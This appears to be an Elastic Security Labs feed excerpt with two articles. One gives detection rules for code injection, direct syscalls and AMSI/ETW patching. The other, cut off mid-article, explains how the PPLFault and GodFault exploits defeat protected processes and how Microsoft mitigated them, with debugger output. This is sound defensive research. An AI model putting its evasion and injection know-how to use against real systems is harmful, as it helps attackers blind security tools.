<p>However, this approach proved insufficient in reducing API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blindspot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.</p>
<p>Currently, we propagate visibility into the following APIs -</p>
<ul>
<li><code>VirtualAlloc</code></li>
<li><code>VirtualProtect</code></li>
<li><code>MapViewOfFile</code></li>
<li><code>VirtualAllocEx</code></li>
<li><code>VirtualProtectEx</code></li>
<li><code>MapViewOfFile2</code></li>
<li><code>QueueUserAPC</code> [call stacks not always available due to ETW limitations]</li>
<li><code>SetThreadContext</code> [call stacks planned for 8.12]</li>
<li><code>WriteProcessMemory</code></li>
<li><code>ReadProcessMemory</code> (lsass) [planned for 8.12]</li>
</ul>
<p>In addition to call stack information, our API events are also enriched with several <a href="https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml">behaviors</a>:</p>
<table>
<thead>
<tr>
<th>API event</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>cross-process</code></td>
<td>The observed activity was between two processes.</td>
</tr>
<tr>
<td><code>native_api</code></td>
<td>A call was made directly to the undocumented Native API rather than the supported Win32 API.</td>
</tr>
<tr>
<td><code>direct_syscall</code></td>
<td>A syscall instruction originated outside of the Native API layer.</td>
</tr>
<tr>
<td><code>proxy_call</code></td>
<td>The call stack appears to show a proxied API call to masking the true caller.</td>
</tr>
<tr>
<td><code>sensitive_api</code></td>
<td>Executable non-image memory is unexpectedly calling a sensitive API.</td>
</tr>
<tr>
<td><code>shellcode</code></td>
<td>Suspicious executable non-image memory is calling a sensitive API.</td>
</tr>
<tr>
<td><code>image-hooked</code></td>
<td>An entry in the call stack appears to have been hooked.</td>
</tr>
<tr>
<td><code>image_indirect_call</code></td>
<td>An entry in the call stack was preceded by a call to a dynamically resolved function.</td>
</tr>
<tr>
<td><code>image_rop</code></td>
<td>An entry in the call stack was not preceded by a call instruction.</td>
</tr>
<tr>
<td><code>image_rwx</code></td>
<td>An entry in the call stack is writable.</td>
</tr>
<tr>
<td><code>unbacked_rwx</code></td>
<td>An entry in the call stack is non-image and writable.</td>
</tr>
<tr>
<td><code>allocate_shellcode</code></td>
<td>A region of non-image executable memory suspiciously allocated more executable memory.</td>
</tr>
<tr>
<td><code>execute_fluctuation</code></td>
<td>The PAGE_EXECUTE protection is unexpectedly fluctuating.</td>
</tr>
<tr>
<td><code>write_fluctuation</code></td>
<td>The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.</td>
</tr>
<tr>
<td><code>hook_api</code></td>
<td>A change to the memory protection of a small executable image memory region was made.</td>
</tr>
<tr>
<td><code>hollow_image</code></td>
<td>A change to the memory protection of a large executable image memory region was made.</td>
</tr>
<tr>
<td><code>hook_unbacked</code></td>
<td>A change to the memory protection of a small executable non-image memory was made.</td>
</tr>
<tr>
<td><code>hollow_unbacked</code></td>
<td>A change to the memory protection of a large executable non-image memory was made.</td>
</tr>
<tr>
<td><code>guarded_code</code></td>
<td>Executable memory was unexpectedly marked as PAGE_GUARD.</td>
</tr>
<tr>
<td><code>hidden_code</code></td>
<td>Executable memory was unexpectedly marked as PAGE_NOACCESS.</td>
</tr>
<tr>
<td><code>execute_shellcode</code></td>
<td>A region of non-image executable memory was executed in an unexpected fashion.</td>
</tr>
<tr>
<td><code>hardware_breakpoint_set</code></td>
<td>A hardware breakpoint was potentially set.</td>
</tr>
</tbody>
</table>
<h2>New Rules</h2>
<p>In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.</p>
<p>These rules include:</p>
<h3>Windows API Call via Direct Syscall</h3>
<p>Identifies the call of commonly abused Windows APIs to perform code injection and where the call stack is not starting with NTDLL:</p>
<pre><code>api where event.category == &quot;intrusion_detection&quot; and

    process.Ext.api.behaviors == &quot;direct_syscall&quot; and 

    process.Ext.api.name : (&quot;VirtualAlloc*&quot;, &quot;VirtualProtect*&quot;, 
                             &quot;MapViewOfFile*&quot;, &quot;WriteProcessMemory&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image1.png" alt="Windows API Call via Direct Syscall rule logic" /></p>
<h3>VirtualProtect via Random Indirect Syscall</h3>
<p>Identifies calls to the VirtualProtect API and where the call stack is not originating from its equivalent NT syscall NtProtectVirtualMemory:</p>
<pre><code>api where 

 process.Ext.api.name : &quot;VirtualProtect*&quot; and 

 not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: (&quot;*ntdll.dll!NtProtectVirtualMemory*&quot;, &quot;*ntdll.dll!ZwProtectVirtualMemory*&quot;)) 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image5.png" alt="VirtualProtect via Random Indirect Syscall rule match examples" /></p>
<h3>Image Hollow from Unbacked Memory</h3>
<pre><code>api where process.Ext.api.behaviors == &quot;hollow_image&quot; and 

  process.Ext.api.name : &quot;VirtualProtect*&quot; and 

  process.Ext.api.summary : &quot;*.dll*&quot; and 

  process.Ext.api.parameters.size &gt;= 10000 and process.executable != null and 

  process.thread.Ext.call_stack_summary : &quot;*Unbacked*&quot;
</code></pre>
<p>Below example of matches on <code>wwanmm.dll</code> module stomping to replace it’s memory content with a malicious payload:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image2.png" alt="Image Hollow from Unbacked Memory rule match examples" /></p>
<h3>AMSI and WLDP Memory Patching</h3>
<p>Identifies attempts to modify the permissions or write to Microsoft Antimalware Scan Interface or the Windows Lock Down Policy related DLLs from memory to modify its behavior for evading malicious content checks:</p>
<pre><code>api where

 (
  (process.Ext.api.name : &quot;VirtualProtect*&quot; and 
    process.Ext.api.parameters.protection : &quot;*W*&quot;) or

  process.Ext.api.name : &quot;WriteProcessMemory*&quot;
  ) and

 process.Ext.api.summary : (&quot;* amsi.dll*&quot;, &quot;* mpoav.dll*&quot;, &quot;* wldp.dll*&quot;) 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image6.png" alt="AMSI and WLDP Memory Patching rule match examples" /></p>
<h3>Evasion via Event Tracing for Windows Patching</h3>
<p>Identifies attempts to patch the Microsoft Event Tracing for Windows via memory modification:</p>
<pre><code>api where process.Ext.api.name :  &quot;WriteProcessMemory*&quot; and 

process.Ext.api.summary : (&quot;*ntdll.dll!Etw*&quot;, &quot;*ntdll.dll!NtTrace*&quot;) and 

not process.executable : (&quot;?:\\Windows\\System32\\lsass.exe&quot;, &quot;\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image4.png" alt="Evasion via Event Tracing for Windows Patching rule match examples" /></p>
<h3>Windows System Module Remote Hooking</h3>
<p>Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:</p>
<pre><code>api where process.Ext.api.name : &quot;WriteProcessMemory&quot; and  

process.Ext.api.behaviors == &quot;cross-process&quot; and 

process.Ext.api.summary : (&quot;*ntdll.dll*&quot;, &quot;*kernelbase.dll*&quot;)
</code></pre>
<p>Below is an example of matches on <a href="https://github.com/CCob/ThreadlessInject">ThreadLessInject</a>, a new process injection technique that involves hooking an export function from a remote process to gain shellcode execution (avoiding the creation of a remote thread):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image3.png" alt="ThreadlessInject example detecting via the Windows System Module Remote Hooking rule" /></p>
<h2>Conclusion</h2>
<p>Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and optionally directly into their hands without any hidden filtering assumptions.</p>
<p><a href="https://www.elastic.co/kr/guide/en/security/current/release-notes.html">Stay tuned</a> for the call stack features in upcoming releases of Elastic Security.</p>
<h2>Resources</h2>
<h3>Rules released with 8.11:</h3>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_amsi_or_wldp_bypass_via_memory_patching.toml">AMSI or WLDP Bypass via Memory Patching</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_call_stack_spoofing_via_synthetic_frames.toml">Call Stack Spoofing via Synthetic Frames</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_evasion_via_event_tracing_for_windows_patching.toml">Evasion via Event Tracing for Windows Patching</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_memory_protection_modification_of_an_unsigned_dll.toml">Memory Protection Modification of an Unsigned DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_network_activity_from_a_stomped_module.toml">Network Activity from a Stomped Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_evasion_via_invalid_code_signature.toml">Potential Evasion via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_an_exception_handler.toml">Potential Injection via an Exception Handler</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_asynchronous_procedure_call.toml">Potential Injection via Asynchronous Procedure Call</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_thread_call_stack_spoofing.toml">Potential Thread Call Stack Spoofing</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_injection_via_mapping.toml">Remote Process Injection via Mapping</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_manipulation_by_suspicious_process.toml">Remote Process Manipulation by Suspicious Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_thread_context_manipulation.toml">Remote Thread Context Manipulation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_activity_from_a_control_panel_applet.toml">Suspicious Activity from a Control Panel Applet</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_api_call_from_a_script_interpreter.toml">Suspicious API Call from a Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/persistence_suspicious_api_from_an_unsigned_service_dll.toml">Suspicious API from an Unsigned Service DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_call_stack_trailing_bytes.toml">Suspicious Call Stack Trailing Bytes</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_heap_allocation.toml">Suspicious Executable Heap Allocation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_memory_permission_modification.toml">Suspicious Executable Memory Permission Modification</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_protection_fluctuation.toml">Suspicious Memory Protection Fluctuation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml">Suspicious Memory Write to a Remote Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_ntdll_memory_write.toml">Suspicious NTDLL Memory Write</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_null_terminated_call_stack.toml">Suspicious Null Terminated Call Stack</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_kernel32_memory_protection.toml">Suspicious Kernel32 Memory Protection</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml">Suspicious Remote Memory Allocation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_from_virtual_disk_or_usb.toml">Suspicious Windows API Call from Virtual Disk or USB</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_direct_syscall.toml">Suspicious Windows API Call via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_rop_gadgets.toml">Suspicious Windows API Call via ROP Gadgets</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_proxy_call.toml">Suspicious Windows API Proxy Call</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml">VirtualProtect API Call from an Unsigned DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_call_via_nttestalert.toml">VirtualProtect Call via NtTestAlert</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_indirect_random_syscall.toml">VirtualProtect via Indirect Random Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_rop_gadgets.toml">VirtualProtect via ROP Gadgets</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_api_via_a_callback_function.toml">Windows API via a CallBack Function</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_system_module_remote_hooking.toml">Windows System Module Remote Hooking</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/photo-edited-01.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Inside Microsoft's plan to kill PPLFault]]></title>
            <link>https://www.elastic.co/kr/security-labs/inside-microsofts-plan-to-kill-pplfault</link>
            <guid>inside-microsofts-plan-to-kill-pplfault</guid>
            <pubDate>Fri, 15 Sep 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.]]></description>
            <content:encoded><![CDATA[<p>On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.</p>
<p>The PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the <a href="https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide">Microsoft Virus Initiative</a> are allowed to run their products at the <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">less-trusted Anti-Malware PPL level</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/PPL-Table.jpg" alt="A simplified diagram of the heirarchy of PPL levels" /></p>
<p>A few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (<strong>WinTcb-Light</strong>). Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as <strong>csrss.exe</strong>) and their complex kernel-mode counterparts (such as <strong>win32k.sys</strong>) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes <strong>WinTcb-Light</strong>, mitigating tampering and injection attacks. <a href="https://twitter.com/aionescu">Alex Ionescu</a> stated it clearly in 2013:</p>
<blockquote>
<p>Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, <a href="http://j00ru.vexillium.org/?p=1393">discovered by j00ru</a>, and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In <a href="http://forum.xda-developers.com/showthread.php?t=2092158">Windows 8.1 RT</a>, this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. <a href="http://j00ru.vexillium.org/?p=1455">Similar</a> Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.</p>
</blockquote>
<p>To reduce the attack surface, Microsoft runs most of their PPL code with less privilege than <strong>WinTcb-Light</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/image4.png" alt="APPL processes in Windows 11 22H2, as seen in Process Explorer
" /></p>
<p>Microsoft does not consider PPL to be a <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">security boundary</a>, meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically <a href="https://itm4n.github.io/the-end-of-ppldump/">addressed</a> some such <a href="https://x.com/GabrielLandau/status/1683854578767343619?s=20">vulnerabilities</a> on a less-urgent basis.</p>
<h3>Loading code into PPL processes</h3>
<p>To load code into a PPL process, it must be signed by special certificates. This applies to both executables (process creation) and libraries (DLLs loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.</p>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format">Portable Executable</a> (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:</p>
<ol>
<li>An application calls <strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw">LoadLibrary</a></strong>, passing the path to the DLL to be loaded.</li>
<li><strong>LoadLibrary</strong> calls into the loader within NTDLL (e.g. <strong>ntdll!LdrLoadDll</strong>), which opens a handle to the file using an API such as <strong>NtCreateFile</strong>.</li>
<li>The loader then passes this file handle to <strong><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntcreatesection">NtCreateSection</a></strong>, asking the kernel memory manager to create a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">section object</a> which describes how the file is to be mapped into memory. A section object is also known as a <a href="https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping">file mapping object</a> in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images">executable image</a> (aka <a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga">SEC_IMAGE</a>), which can only be created from PE files.</li>
<li>Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function <strong>MiValidateSectionCreate</strong> relies on the Code Integrity module <strong>ci.dll</strong> to handle the requisite cryptography and <a href="https://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a> policy.</li>
<li>The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct <a href="https://en.wikipedia.org/wiki/Page_table">page table entries</a> with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.</li>
<li>The kernel returns the new section handle to the loader in NTDLL.</li>
<li>The NTDLL loader then asks the kernel memory manager to map a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">view of the section</a> into the process address space via the <strong><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwmapviewofsection">NtMapViewOfSection</a></strong> syscall. The memory manager complies.</li>
<li>Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. The details of this are out of scope.</li>
</ol>
<h3>Page hashes</h3>
<p>In the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - <a href="https://en.wikipedia.org/wiki/Memory_paging">paging</a>.</p>
<p>Unmodified pages belonging to file-backed sections (including <strong>SEC_IMAGE</strong>) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because <strong>SEC_IMAGE</strong> sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.</p>
<p>PE files may be optionally built with the <a href="https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170"><strong>/INTEGRITYCHECK</strong></a> flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls <strong>MiValidateInPage</strong> to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting <a href="https://en.wikipedia.org/wiki/Data_degradation">bit rot</a> in the page file and a few types of attacks. Beyond <strong>/INTEGRITYCHECK</strong> images, page hashes are <a href="https://twitter.com/DavidLinsley11/status/1190810926762450944">also enabled</a> for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.</p>
<p><em><strong>Note:</strong> It is possible to create a <strong>SEC_IMAGE</strong> section from a file with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences">user-writable references</a>, a tactic employed by techniques like <a href="https://jxy-s.github.io/herpaderping/">Process Herpaderping</a>. The existence of user-writable references means that a file could be modified after the image section is created.  When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See <a href="https://www.microsoft.com/en-us/security/blog/2022/06/30/using-process-creation-properties-to-catch-evasion-techniques/">this Microsoft article</a> for more information about user-writable references.</em></p>
<h3>Exploitation</h3>
<p>In September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two <a href="https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability">zero-day</a> vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named <a href="https://github.com/gabriellandau/PPLFault">PPLFault</a> and <a href="https://github.com/gabriellandau/PPLFault#godfault">GodFault</a>, respectively, along with their source code. These exploits allow malware to <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection">bypass LSA protection</a>, terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">this article</a> for more details on their impact.</p>
<p>The admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the <a href="https://learn.microsoft.com/en-us/windows/win32/api/_cloudapi/">Cloud Filter API</a> to violate immutability assumptions of files backing <strong>SEC_IMAGE</strong> sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as <strong>WinTcb-Light</strong>, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get <strong>WinTcb-Light</strong> code execution, then exploits the kernel’s trust of <strong>WinTcb-Light</strong> processes to modify kernel memory, granting itself full read-write access to physical memory.</p>
<p>Though MSRC <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">declined</a> to take any action on these vulnerabilities, the Windows Defender team has <a href="https://twitter.com/PhilipTsukerman/status/1683861340207607813?s=20">shown interest</a>. PPLFault and GodFault were released at <a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">Black Hat Asia</a> in May 2023 alongside a mitigation to stop these exploits called <a href="https://github.com/gabriellandau/PPLFault/tree/main/NoFault">NoFault</a>.</p>
<h3>Mitigation</h3>
<p>On September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function <strong>MiValidateSectionCreate</strong> which enables page hashes for all images that reside on remote devices. Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/Bindiff.jpg" alt="BinDiff comparison of MiValidateSectionCreate in builds 25936 and 25941" /></p>
<p>Decompiled into C, the new code looks like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/New-Code-In-IDA.jpg" alt="New check added in Windows build 25941" /></p>
<p>When PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WER-Event-Log.jpg" alt="PPLFault failing in build 25941 with STATUS_IN_PAGE_ERROR (0xC0000006)" /></p>
<p>PPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned <a href="https://github.com/gabriellandau/PPLFault/tree/main/NoFault">NoFault</a> mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.</p>
<p>Tracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with <strong>STATUS_INVALID_IMAGE_HASH (0xC0000428)</strong>. This is later converted to <strong>STATUS_IN_PAGE_ERROR (0xC0000006)</strong>.</p>
<pre><code>0: kd&gt; g
Breakpoint 1 hit
CI!CiValidateImagePages+0x360:
0010:fffff805`725028b4 b8280400c0      mov     eax,0C0000428h
7: kd&gt; k
 # Child-SP          RetAddr               Call Site
00 fffff508`1b4a6dc0 fffff805`72502487     CI!CiValidateImagePages+0x360
01 fffff508`1b4a6f90 fffff805`6f2f1bbd     CI!CiValidateImageData+0x27
02 fffff508`1b4a6fd0 fffff805`6ee35de5     nt!SeValidateImageData+0x2d
03 fffff508`1b4a7020 fffff805`6efa167b     nt!MiValidateInPage+0x305
04 fffff508`1b4a70d0 fffff805`6ef9fffe     nt!MiWaitForInPageComplete+0x31b
05 fffff508`1b4a71d0 fffff805`6ef68692     nt!MiIssueHardFault+0x3fe
06 fffff508`1b4a72e0 fffff805`6f0a784b     nt!MmAccessFault+0x3b2
07 fffff508`1b4a7460 00007fff`ccf71500     nt!KiPageFault+0x38b
08 000000b6`776bf1b8 00007fff`d5500ac0     0x00007fff`ccf71500
09 000000b6`776bf1c0 00000000`00000000     0x00007fff`d5500ac0
7: kd&gt; !error C0000428
Error code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the 
 digital signature for this file. A recent hardware or software change 
 might have installed a file that is signed incorrectly or damaged, or 
 that might be malicious software from an unknown source.
</code></pre>
<h3>Comparing behavior</h3>
<p>With the fix introduced in build 25941, the final vulnerable build is 25936. Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:</p>
<pre><code>bp /w &quot;&amp;CI!CipValidatePageHash == @rcx&quot; CI!CipValidateImageHash 
 &quot;dt _FILE_OBJECT @r8 FileName; g&quot;
</code></pre>
<p>This command generates the following WinDbg output for build 25936, before the fix:</p>
